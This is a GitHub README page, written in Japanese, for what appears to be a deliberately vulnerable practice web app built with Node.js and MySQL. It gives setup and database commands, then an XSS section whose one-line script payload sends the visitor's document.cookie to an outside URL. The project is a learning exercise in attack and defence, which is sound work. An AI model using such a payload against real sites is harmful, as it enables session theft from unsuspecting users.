Skip to content

Latest commit

 

History

History
39 lines (29 loc) · 900 Bytes

README.md

File metadata and controls

39 lines (29 loc) · 900 Bytes

起動

npx nodemon index.js
dc up -d
dc exec mysql /bin/bash 
mysql -uroot -ptest
use test;
show tables;
select * from users;

+-------------------+
| Tables_in_test_db |
+-------------------+
| users             |
+-------------------+

dc down --volumes

XSS

以下をフォームに入れて送信する

<script type='text/javascript'>document.location='https://www.google.com?cookie=' + document.cookie;</script>

認証方法

Session Authentication

参考

GoogleDoc 脆弱なサイトと罠サイトを実際に作って学ぶ『CSRF』とその対策 ホワイトハッカーへの道 三歩目